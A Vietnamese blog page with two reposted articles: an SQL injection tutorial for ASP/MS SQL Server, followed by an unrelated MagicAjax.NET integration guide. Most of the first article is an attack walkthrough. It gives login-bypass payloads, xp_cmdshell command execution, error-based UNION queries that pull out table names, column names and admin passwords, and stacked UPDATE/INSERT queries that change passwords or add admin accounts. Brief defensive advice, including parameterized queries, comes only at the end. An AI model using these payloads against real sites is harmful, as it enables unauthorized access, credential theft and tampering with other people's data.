Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET

1. SQL Injection là gì?

SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, …

2. Tìm kiếm mục tiêu

Có thể tìm các trang web cho phép submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng, chẳng hạn như các trang login, search, feedback, …

Ví dụ:

http://yoursite.com/index.asp?id=10

Một số trang web chuyển tham số qua các field ẩn, phải xem mã HTML mới thấy rõ. Ví dụ như ở dưới.

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

3. Kiểm tra chỗ yếu của trang web

Thử submit các field username, password hoặc field id, .. bằng hi’ or 1=1–

Nếu site chuyển tham số qua field ẩn, hãy download source HTML, lưu trên đĩa cứng và thay đổi lại URL cho phù hợp. Ví dụ:

<FORM action=http://yoursite.com/Search/search.asp method=post>
<input type=hidden name=A value=”hi’ or 1=1–“>
</FORM>

Nếu thành công, thì có thể login vào mà không cần phải biết username và password

4. Tại sao ‘ or 1=1– có thể vượt qua phần kiểm tra đăng nhập?

Giả sử như có một trang ASP liên kết đến một ASP trang khác với URL như sau:

http://yoursite.com/index.asp?category=food

Trong URL trên, biến ‘category‘ được gán giá trị là ‘food‘. Mã ASP của trang này có thể như sau (đây chỉ là ví dụ thôi):

v_cat = request(“category”)
sqlstr=”SELECT * FROM product WHERE PCategory='” & v_cat & “‘”
set rs=conn.execute(sqlstr)

v_cat sẽ chứa giá trị của biến request(“category”) là ‘food‘ và câu lệnh SQL tiếp theo sẽ là:

SELECT * FROM product WHERE PCategory=’food’

Dòng query trên sẽ trả về một tập resultset chứa một hoặc nhiều dòng phù hợp với điều kiện WHERE PCategory=’food’

Nếu thay đổi URL trên thành http://yoursite.com/index.asp?category=food’ or 1=1– , biến v_cat sẽ chứa giá trị “food’ or 1=1– ” và dòng lệnh SQL query sẽ là:

SELECT * FROM product WHERE PCategory=’food’ or 1=1–‘

Dòng query trên sẽ select mọi thứ trong bảng product bất chấp giá trị của trường PCategory có bằng ‘food’ hay không. Hai dấu gạch ngang (–) chỉ cho MS SQL server biết đã hết dòng query, mọi thứ còn lại sau “–” sẽ bị bỏ qua. Đối với MySQL, hãy thay “–” thành “#”

Ngoài ra, cũng có thể thử cách khác bằng cách submit ‘ or ‘a’=’a. Dòng SQL query bây giờ sẽ là:

SELECT * FROM product WHERE PCategory=’food’ or ‘a’=’a’

Một số loại dữ liệu khác mà cũng nên thử submit để biết xem trang web có gặp lỗi hay không:

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or ‘a’=’a

” or “a”=”a

‘) or (‘a’=’a

5. Thi hành lệnh từ xa bằng SQL Injection

Nếu cài đặt với chế độ mặc định mà không có điều chỉnh gì, MS SQL Server sẽ chạy ở mức SYSTEM, tương đương với mức truy cập Administrator trên Windows. Có thể dùng store procedure xp_cmdshell trong CSDL master để thi hành lệnh từ xa:

‘; exec master..xp_cmdshell ‘ping 10.10.1.2’–

Hãy thử dùng dấu nháy đôi (“) nếu dấu nháy đơn (‘) không làm việc.

Dấu chấm phẩy (sẽ kết thúc dòng SQL query hiện tại và cho phép thi hành một SQL command mới. Để kiểm tra xem lệnh trên có được thi hành hay không, có thể listen các ICMP packet từ 10.10.1.2 bằng tcpdump như sau:

#tcpdump icmp

Nếu nhận được ping request từ 10.10.1.2 nghĩa là lệnh đã được thi hành.

6. Nhận output của SQL query

Có thể dùng sp_makewebtask để ghi các output của SQL query ra một file HTML

‘; EXEC master..sp_makewebtask “\\10.10.1.3\share\output.html”, “SELECT * FROM INFORMATION_SCHEMA.TABLES”

Chú ý: folder “share” phải được share cho Everyone trước.

7. Nhận dữ liệu qua ‘database using ODBC error message

Các thông báo lỗi của MS SQL Server thường đưa cho bạn những thông tin quan trọng. Lấy ví dụ ở trên http://yoursite.com/index.asp?id=10, bây giờ chúng ta thử hợp nhất integer ’10’ với một string khác lấy từ CSDL:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

Bảng INFORMATION_SCHEMA.TABLES của hệ thống SQL Server chứa thông tin về tất cả các bảng (table) có trên server. Trường TABLE_NAME chứa tên của mỗi bảng trong CSDL. Chúng ta chọn nó bởi vì chúng ta biết rằng nó luôn tồn tại. Query của chúng ta là:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

Dòng query này sẽ trả về tên của bảng đầu tiên trong CSDL

Khi chúng ta kết hợp chuỗi này với số integer 10 qua statement UNION, MS SQL Server sẽ cố thử chuyển một string (nvarchar) thành một số integer. Điều này sẽ gặp lỗi nếu như không chuyển được nvarchar sang int, server sẽ hiện thông báo lỗi sau:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1’ to a column of data type int.

/index.asp, line 5

Thông báo lỗi trên cho biết giá trị muốn chuyển sang integer nhưng không được, “table1“. Đây cũng chính là tên của bảng đầu tiên trong CSDL mà chúng ta đang muốn có.

Để lấy tên của tên của bảng tiếp theo, có thể dùng query sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (‘table1’)–

Cũng có thể thử tìm dữ liệu bằng cách khác thông qua statement LIKE của câu lệnh SQL:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%25login%25’–

Khi đó thông báo lỗi của SQL Server có thể là:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin_login’ to a column of data type int.

/index.asp, line 5

Mẫu so sánh ‘%25login%25‘ sẽ tương đương với %login% trong SQL Server. Như thấy trong thông báo lỗi trên, chúng ta có thể xác định được tên của một table quan trọng là “admin_login“.

8. Xác định tên của các column trong table

Table INFORMATION_SCHEMA.COLUMNS chứa tên của tất cả các column trong table. Có thể khai thác như sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’–

Khi đó thông báo lỗi của SQL Server có thể như sau:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_id’ to a column of data type int.

/index.asp, line 5

Như vậy tên của column đầu tiên là “login_id“. Để lấy tên của các column tiếp theo, có thể dùng mệnh đề logic NOT IN () như sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’)–

Khi đó thông báo lỗi của SQL Server có thể như sau:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_name’ to a column of data type int.

/index.asp, line 5

Làm tương tự như trên, có thể lấy được tên của các column còn lại như “password“, “details“. Khi đó ta lấy tên của các column này qua các thông báo lỗi của SQL Server, như ví dụ sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’,’login_name’,’password’,details’)–

Khi đó thông báo lỗi của SQL Server có thể như sau:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.

/index.asp, line 5

9. Thu thập các dữ liệu quan trọng

Chúng ta đã xác định được các tên của các table và column quan trọng. Chúng ta sẽ thu thập các thông tin quan trọng từ các table và column này.

Có thể lấy login_name đầu tiên trong table “admin_login” như sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login–

Khi đó thông báo lỗi của SQL Server có thể như sau:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘neo’ to a column of data type int.

/index.asp, line 5

Dễ dàng nhận ra được admin user đầu tiên có login_name là “neo“. Hãy thử lấy password của “neo” như sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’–

Khi đó thông báo lỗi của SQL Server có thể như sau:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘m4trix’ to a column of data type int.

/index.asp, line 5

Và bây giờ là đã có thể login vào với username là “neo” và password là “m4trix“.

10. Nhận các numeric string

Có một hạn chế nhỏ đối với phương pháp trên. Chúng ta không thể nhận được các error message nếu server có thể chuyển text đúng ở dạng số (text chỉ chứa các kí tự số từ 0 đến 9). Giả sử như password của “trinity” là “31173“. Vậy nếu ta thi hành lệnh sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’–

Thì khi đó chỉ nhận được thông báo lỗi “Page Not Found“. Lý do bởi vì server có thể chuyển passoword “31173” sang dạng số trước khi UNION với integer 10. Để giải quyết vấn đề này, chúng ta có thể thêm một vài kí tự alphabet vào numeric string này để làm thất bại sự chuyển đổi từ text sang số của server. Dòng query mới như sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’–

Chúng ta dùng dấu cộng (+) để nối thêm text vào password (ASCII code của ‘+’ là 0x2b). Chúng ta thêm chuỗi ‘(space)morpheus’ vào cuối password để tạo ra một string mới không phải numeric string là ‘31173 morpheus’. Khi hàm convert() được gọi để chuyển ‘31173 morpheus’ sang integer, SQL server sẽ phát lỗi ODBC error message sau:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘31173 morpheus’ to a column of data type int.

/index.asp, line 5

Và nghĩa là bây giờ ta cũng có thể login vào với username ‘trinity‘ và password là ‘31173

11. Thay đổi dữ liệu (Update/Insert) của CSDL

Khi đã có tên của tất cả các column trong table, có thể sử dụng statement UPDATE hoặc INSERT để sửa đổi/tạo mới một record vào table này.

Để thay đổi password của “neo”, có thể làm như sau:

http://yoursite.com/index.asp?id=10; UPDATE ‘admin_login’ SET ‘password’ = ‘newpas5′ WHERE login_name=’neo’–

Hoặc nếu bạn muốn một record mới vào table:

http://yoursite.com/index.asp?id=10; INSERT INTO ‘admin_login’ (‘login_id’, ‘login_name’, ‘password’, ‘details’) VALUES (666,’neo2′,’newpas5′,’NA’)–

Và bây giờ có thể login vào với username “neo2” và password là “newpas5”

12. Ngăn chặn SQL Injection

Hãy loại bỏ các kí tự meta như ‘”/\; và các kí tự extend như NULL, CR, LF, … trong các string nhận được từ:

  • input do người dùng đệ trình
  • các tham số từ URL
  • các giá trị từ cookie

Đối với các giá trị numeric, hãy chuyển nó sang integer trước khi query SQL, hoặc dùng ISNUMERIC để chắc chắn nó là một số integer.

Thay đổi “Startup and run SQL Server” dùng mức low privilege user trong tab SQL Server Security.

Xóa các stored procedure trong database master mà không dùng như:

  • xp_cmdshell
  • xp_startmail
  • xp_sendmail
  • sp_makewebtask

13. Ngăn chặn SQL Injection trong ASP.NET

Các cách thức ngăn chặn SQL Injection được trình bày ở phần 12 đã bao quát đủ phương pháp, nhưng trong ASP.NET có cách ngăn chặn đơn giản là sử dụng các Parameters khi làm việc với object SqlCommand (hoặc OleDbCommand) chứ không sử dụng các câu lệnh SQL trực tiếp. Khi đó .NET sẽ tự động validate kiểu dữ liệu, nội dung dữ liệu trước khi thực hiện câu lệnh SQL.

Ngoài ra, cũng cần kiểm soát tốt các thông báo lỗi. Và mặc định trong ASP.NET là thông báo lỗi sẽ không được thông báo chi tiết khi không chạy trên localhost.

13. Tài liệu thao khảo

Theo blog thuynt

Advertisements

Chuyển trang ASP.NET sang Ajax với MagicAjax.NET

Là một trong những công nghệ nền tảng của Web 2.0, Ajax đã và đang làm thay đổi cách chúng ta nhìn nhận và sử dụng các ứng dụng web. Cùng với sự phát triển của các trang web hỗ trợ Ajax, các công cụ giúp các nhà phát triển nhanh chóng xây dựng các trang web này cũng đã ra đời và ngày càng phát triển. Một trong số đó là thư viện Ajax.NET (Bài “Sử dụng Ajax trong lập trình ASP.NET”, TGVT A số tháng 3/2006, trang 115).

Trong bài viết này, tôi sẽ giới thiệu một công cụ khác hỗ trợ phát triển Ajax không kém phần hiệu quả, đó là MagicAjax.NET (gọi tắt là MagicAjax). MagicAjax.NET giúp bạn đưa trang Web ASP.NET hiện có sang hỗ trợ Ajax một cách trực quan mà không cần phải thay thế các điều khiển ASP.NET đã có và/hoặc viết thêm mã JavaScript.

MagicAjax.NET là một dự án mã nguồn mở (C#) tuân theo các điều khoản trong giấy phép GNU Lesser GPL. Hiện phiên bản mới nhất là 0.3.0. Bạn có thể tải về thư viện, mã nguồn, các ví dụ cũng như tài liệu từ trang web chính thức của dự án http://www.magicajax.net.

Các đặc điểm của MagicAjax

• Tích hợp:

– Chỉ cần vài dòng thiết lập cấu hình trong web.config là có thể dùng MagicAjax.

– Chỉ cần thêm vào một điều khiển (AjaxPanel) để trang web của bạn hỗ trợ Ajax.

• Sử dụng:

Đặt phần trang web mà bạn muốn hỗ trợ Ajax vào trong AjaxPanel, công việc còn lại sẽ do MagicAjax Framework đảm nhiệm.

– Có thể đưa MagicAjax vào Visual Studio để sử dụng một cách trực quan.

– Không cần viết mã JavaScript để xử lí phía trình duyệt.

• Lập trình:

– Trong phần lớn trường hợp, để sử dụng MagicAjax, bạn chỉ cần thêm các AjaxPanel mà không cần thay đổi mã nguồn.

– MagicAjax thay hàm PostBack bằng hàm callback của Ajax (AjaxCall).

– Có thể dùng cả hàm PostBack và chức năng Ajax trong cùng một trang, chỉ những phần nằm trong AjaxPanel mới gọi AjaxCall thay cho PostBack.

– ViewState của trang web được chia sẻ giữa PostBack và AjaxCall, khi có một thay đổi tạo bởi AjaxCall, PostBack có thể dùng thay đổi đó và ngược lại.

– Bạn có thể điều khiển AjaxCall tương tự như PostBack, sử dụng lập trình ASP.NET phía server.

– MagicAjax nhận ra những thay đổi trong khi gọi AjaxCall, và gửi một đoạn mã JavaScript nhỏ nhất có thể để phản hồi các thay đổi đến trình duyệt.

– Có thể dùng mã để điều khiển.

• Tùy biến:

– Cung cấp nhiều thiết lập cho phép bạn sử dụng linh hoạt.

– Có thể tùy biến các điều khiển ASP.NET khi dùng chúng với MagicAjax.

– Có thể khai báo hàm AjaxCall sẽ gọi đồng bộ hay không đồng bộ đối với tất cả các điều khiển nằm trong AjaxPanel hay là chỉ với một điều khiển riêng biệt nằm trong đó.

– Bạn có thể khai báo một điều khiển nào đó của AjaxPanel sẽ gọi thuần PostBack.

– Thiết kế hướng đối tượng rõ ràng giúp bạn dễ dàng mở rộng Magic và tạo các điều khiển Ajax của chính bạn.

• Tương thích:

– MagicAjax hỗ trợ hầu hết các trình duyệt hiện nay như Internet Explorer, Firefox, Opera và Netscape.

– Nếu trình duyệt không hỗ trợ hoặc người dùng cấm tính năng JavaScript trong trình duyệt, trang web sẽ tự động chuyển về sử dụng PostBack.

Tích hợp MagicAjax

Mục đích của MagicAjax là hỗ trợ chuyển từ trang web ASP.NET hiện có sang Ajax một cách dễ dàng nhất, do vậy việc tích hợp MagicAjax hạn chế tối đa viết mã. Các bước thực hiện như sau:

1) Thay đổi web.config:

Bạn nên đăng kí MagicAjax ở section system.web trong file web.config như sau:

<httpModules>

<add name=”MagicAjax” type=”MagicAjax.MagicAjaxModule, MagicAjax” />

</httpModules>

Lúc này, MagicAjax sẽ sử dụng các thiết lập mặc định. Nếu muốn thay đổi các thiết lập, bạn có thể chỉnh sửa file web.config theo ý mình (một số chỉnh sửa quan trọng sẽ được giới thiệu trong phần sau của bài viết).

2) Thêm các điều khiển vào trang web:

Dùng một tag để đăng kí sử dụng namespace cho các điều khiển MagicAjax ở đầu trang web:
<%@ Register TagPrefix=”ajax” Namespace=”MagicAjax.UI.Controls” Assembly=”MagicAjax” %>

Sau đó, bạn có thể khai báo một điều khiển theo cấu trúc:

<ajax:AjaxPanel id=”AjaxPanel1” runat=”server”></ajax:AjaxPanel>

Bạn hãy để ý đến tag <ajax:AjaxPanel> và </ajax:AjaxPanel>, tag này có nhiệm vụ giới hạn “tầm ảnh hưởng” của Ajax. Chỉ những điều khiển nào được đặt trong tag này mới hỗ trợ Ajax, còn không thì chúng chỉ là những điều khiển thông thường. Điều này cho phép bạn sử dụng Ajax một cách linh hoạt.

3) Thêm thư viện MagicAjax:

Bạn tạo một thư mục bin nằm trong thư mục chứa trang web của mình. Copy file MagicAjax.dll vào, thế là xong. Bạn hãy mở trình duyệt và xem sự khác biệt.

4) Tích hợp MagicAjax trong môi trường Visual Studio (từ phiên bản 2003 trở lên):

Từ menu Tools, chọn Add/Remove Toolbox Items (chọn Toolbox Items với VS 2005), nhấn vào Browse và chỉ đến file MagicAjax.dll. Các điều khiển sẽ được thêm vào trong toolbox như bạn thấy dưới đây:
Lúc này, bạn có thể tạo một AjaxPanel để kéo-thả các điều khiển vào đó:

Các bước còn lại hoàn toàn như đã trình bày ở trên, chỉ có điều bạn làm một cách “trực quan” hơn trong môi trường VS mà thôi (bạn chỉ cần sửa lại web.config, còn các điều khiển nằm trong AjaxPanel sẽ được khai báo tự động hỗ trợ Ajax).

Sử dụng MagicAjax

AjaxPanel là nhân của MagicAjax, tương tự như panel của ASP.NET, các thành phần bên trong nó được hiển thị trực quan và bạn có thể thiết lập các thuộc tính của các điều khiển web, thay đổi thuộc tính Visible của nó… Hàm PostBack của tất cả các điều khiển nằm trong AjaxPanel được thay thế bằng AjaxCall, trừ khi nó được khai báo khác. Thuộc tính AjaxCallConnection của các điều khiển trong AjaxPanel có thể thiết lập thành:

Asynchronous (không đồng bộ – mặc định): AjaxCall sẽ được sử dụng dưới dạng nền (background), mã lệnh sẽ tiếp tục thực hiện mà không cần đợi nó trả về.

Synchronous (đồng bộ): trình duyệt sẽ đợi cho đến khi AjaxCall kết thúc.

None: các điều khiển này sẽ dùng hàm PostBack thông thường.

Thuộc tính ExcludeFlags của AjaxPanel xác định xem thành phần nào trong form sẽ bị loại khi một hàm AjaxCall gửi đến máy chủ, vì thế giảm số lượng gọi AjaxCall. Nó thiết lập thuộc tính ExcludeFlags của MagicAjax cho các điều khiển ASP.NET (bạn sẽ thấy ở phần sau). Một AjaxPanel con sẽ tự động thừa kế thuộc tính này của cha nó. Nó có thể đánh dấu thêm các thành phần của form để loại bỏ thông qua thuộc tính ExcludeFlags của nó, nhưng nó sẽ không thể gửi đến máy chủ các thành phần của form đã được đánh dấu để loại bỏ bởi cha của nó.

Để giảm lượng HTML cần gửi đến client, MagicAjax định nghĩa các “chủ thể HTML” riêng biệt. Một AjaxPanel con nằm trong một AjaxPanel cha, sẽ định nghĩa chủ thể HTML riêng biệt với cha nó. AjaxPanel cha sẽ bỏ qua mã HTML của AjaxPanel con, chỉ có AjaxPanel con chịu trách nhiệm phản hồi với chủ thể của nó trên client. Vì vậy, bạn có thể giảm số lượng AjaxCall, bằng cách thêm nhiều AjaxPanel để khai báo nhiều chủ thể HTML nhỏ hơn. Ví dụ, nếu bạn đặt một bảng trong một AjaxPanel, và thay đổi một trong số các cell của nó trong một AjaxCall, toàn bộ mã HTML của bảng đó sẽ được gửi đến client. Nếu bạn thêm một AjaxPanel cho mỗi cell, chỉ có mã HTML của cell đã thay đổi được gửi đến client.

AjaxPanel có thuộc tính AjaxLocalScope là true được gọi là AjaxZone. Khi một điều khiển nằm trong AjaxZone gọi một hàm AjaxCall, chỉ các giá trị của các thành phần trong form nằm trong AjaxZone được gửi đến máy chủ. Máy chủ sẽ kiểm tra các thay đổi và chỉ phản hồi đến các AjaxPanel nằm trong AjaxZone đó. Điều này sẽ làm giảm lưu chuyển Ajax và tăng khả năng đáp ứng của máy chủ. Mục đích của nó là tạo các phần riêng rẽ và độc lập với nhau trên cùng một trang, tương tự như các UserControl. Một AjaxZone có thể chứa các AjaxZone khác. Một điều khiển thuộc về AjaxZone là cha trực tiếp của nó.

Bạn có thể thiết lập các thuộc tính sau với các điều khiển ASP.NET để quyết định cách chúng được dùng bởi MagicAjax:

– AjaxCall (“Async”, “Sync” hoặc “None” ): Khi bạn thêm thiết lập AjaxCall với giá trị là “Async” hoặc “Sync” cho một điều khiển sử dụng chức năng PostBack (như Button, LinkButton, CheckBox,…), chức năng này sẽ được thay thế bằng chức năng Ajax, ngay cả khi điều khiển đó không nằm trong một AjaxPanel. Khi bạn thêm thiết lập AjaxCall với giá trị “None” vào một điều khiển nằm trong AjaxPanel, điều khiển này sẽ dùng PostBack thay cho AjaxCall. Bằng cách thêm thuộc tính AjaxCall, bạn có thể ghi chồng thuộc tính AjaxCallConnection của AjaxPanel chứa nó (ví dụ, nếu AjaxPanel được thiết lập để làm việc không đồng bộ, bạn có thể thêm AjaxCall với giá trị “sync” để nó thực hiện một lời gọi AjaxCall đồng bộ). Thuộc tính AjaxCall sẽ được áp dụng cho tất cả các con cháu của điều khiển, thế nên nếu bạn thêm nó vào một khung ASP.NET đơn thuần, tất cả các điều khiển nằm trong đó sẽ chịu ảnh hưởng của thuộc tính AjaxCall.

– ExcludeFromPost (“true” hoặc “false”): Khi thực hiện một lời gọi AjaxCall, client gửi các giá trị của các thành phần của form về máy chủ như là dữ liệu POST. Nếu điều khiển chỉ đơn giản dùng để hiển thị thông tin, và không nhận thông tin người dùng nhập vào, bạn có thể thêm thuộc tính ExcludeFromPost với giá trị là “true”, thì giá trị của điều khiển đó sẽ không được gửi đến máy chủ. Bạn có thể giảm lưu lượng thông tin không cần thiết giữa client và máy chủ bằng cách thêm thuộc tính này cho các điều khiển như readonly Textbox hay Label.

– AjaxLocalScope (“true” hoặc “false”): Thiết lập này điều khiển hoạt động tương tự một AjaxZone (đã nói ở phần trên).

– ExcludeFlags (biểu thức): Xác định xem thành phần nào của form sẽ bị loại bỏ khi gửi đến server trong một lời gọi AjaxCall. Thành phần của form sẽ bị loại bỏ khi gọi AjaxCall từ một điều khiển hay từ các con cháu của nó. Thuộc tính này nên được thiết lập với một biểu thức số học mà giá trị trả về là một số nguyên. Bạn có thể dùng các hằng số của JavaScript như excfViewState, excfFingerprints, excfUserHidden, excfAllHidden, excfFormElements, excfAllElements.

Ví dụ:

<asp:button excludeflags=”excfFormElements | excfViewState” …>

Chú ý là tất cả các thuộc tính trên đều có thể dùng mã để thiết lập. Các giá trị của chúng có thể thay đổi trong một AjaxCall:

Ví dụ:

Button1.Attributes[“ajaxcall”] = “async”;

Thiết lập MagicAjax

Thiết lập web.config

Bạn có thể thay đổi các thiết lập mặc định của MagicAjax trong section configuration của web.config. Các thiết lập này sẽ được áp dụng cho tất cả các trang có trong ứng dụng của bạn. Nếu bạn bỏ sót một thiết lập nào đó, MagicAjax sẽ sử dụng giá trị mặc định. Dưới đây là một ví dụ:

<configSections>

<section name=”magicAjax”

type=”MagicAjax.Configuration.MagicAjaxSectionHandler, MagicAjax”/>

</configSections>

<magicAjax

outputCompareMode=”HashCode”

tracing=”false”>

<pageStore

mode=”NoStore”

unloadStoredPage=”false”

cacheTimeout=”5”

maxConcurrentPages=”5”

maxPagesLimitAlert=”false”

/>

</magicAjax>

Thiết lập bằng mã

Bên cạnh việc sử dụng web.config, bạn có thể dùng mã để ghi chồng các thiết lập cho từng trang riêng biệt. Thuộc tính MagicAjaxContext.Current.Configuration chứa tất cả các tùy chọn. Trong sự kiện Load, bạn có thể thay đổi bất kì giá trị nào của nó, ví dụ:

private void Page_Load(object sender, System.EventArgs e)

{

MagicAjaxContext.Current.Configuration.PageStore.Mode = MagicAjax.Configuration.PageStoreMode.Session;

}

Các thay đổi của bạn sẽ được lưu vào một trường ẩn của trang và sẽ được phục hồi cho mỗi hàm PostBack/AjaxCall. Đoạn mã trên có thể viết như sau:
private void Page_Load(object sender, System.EventArgs e)

{

if ( !IsPostBack )

{

MagicAjaxContext.Current.Configuration.PageStore.Mode = MagicAjax.Configuration.PageStoreMode.Session;

}

}

Chú ý là các thiết lập chỉ được thay đổi trong hàm PostBack, còn với AjaxCall, điều này sẽ gây ra một lỗi ngoại lệ.

Một số thiết lập quan trọng:

• ScriptPath:

Kiểu: string, mặc định: null.

Script của MagicAjax đã được nhúng vào trong file MagicAjax.dll và được đặt vào trang có script như sau:

<script type=”text/javascript” src=”AjaxCallObject.js.aspx”></script>

Bạn có thể dùng script của mình bằng cách thiết lập:

<magicAjax ScriptPath=”~/script” />

Khi đó thuộc tính src ở trên sẽ chứa đường dẫn của ScriptPath.

• Tracing:

Kiểu: boolean, mặc định: false.

Nếu bật thiết lập tracing, một cửa sổ popup sẽ được tạo để hiển thị thông tin đã được gửi đến và gửi đi từ server, cho phép bạn giám sát các lời gọi AjaxCall từ trang web đó, điều này sẽ rất hữu ích khi bạn cần bẫy lỗi.

• PageStore – Mode

Kiểu: liệt kê (NoStore/Session/Cache), mặc định: NoStore.

Thiết lập này quyết định các hoạt động của Ajax, điểm khác biệt giữa các giá trị của nó như sau:

* NoStore: Đây là thiết lập được khuyến cáo sử dụng. Chu kì thực hiện của AjaxCall cũng giống PostBack. Mỗi khi có lời gọi AjaxCall, trang web và các điều khiển được tạo lại, không có gì được giữ lại ở máy chủ, các sự kiện với điều khiển ASP.NET được tạo. Tương thích với .NET 1.1 và 2.0

* Session: Trang web được yêu cầu sẽ lưu lại trên máy chủ, MagicAjax sẽ tạo các sự kiện khác nhau cho trang này. Chỉ tương thích với .NET 1.1. Đồng thời, nó chỉ làm việc với chế độ “InProc”, không làm việc với “StateServer” và “SQLServer”.

* Cache: làm việc tương tự chế độ Session, chỉ khác với chế độ Session ở chỗ trang web sẽ được lưu trên bộ đệm của máy chủ, vì vậy nó có thể làm việc được với “State Server” và “SQLServer”.

Trên đây là một số thiết lập quan trọng nhất. Các thiết lập khác bạn có thể tham khảo thêm tài liệu đi kèm với thư viện.

Hạn chế của MagicAjax

Phiên bản hiện tại của MagicAjax có các hạn chế sau:

* Với chế độ PageStore là NoStore, nếu các tag thuộc tính (như CssClass, BackColor,…) của một AjaxPanel thay đổi trong một AjaxCall, các thay đổi sẽ không được phản hồi đến trình duyệt.

* Điều khiển FileUpload sẽ không làm việc trong một AjaxCall.

Hạn chế khi dùng với .NET 2.0:

* Phương thức Server.Transfer gọi trong một AjaxCall sẽ không được sử dụng một cách phù hợp.

* Không hỗ trợ chế độ Session/Cache của PageStore.

Hi vọng bài viết này giúp bạn có một cái nhìn tổng quát về thư viện MagicAjax và bạn sẽ khám phá thêm nhiều điều thú vị khi sử dụng MagicAjax. Chúc các bạn thành công.

(Theo PCWorld)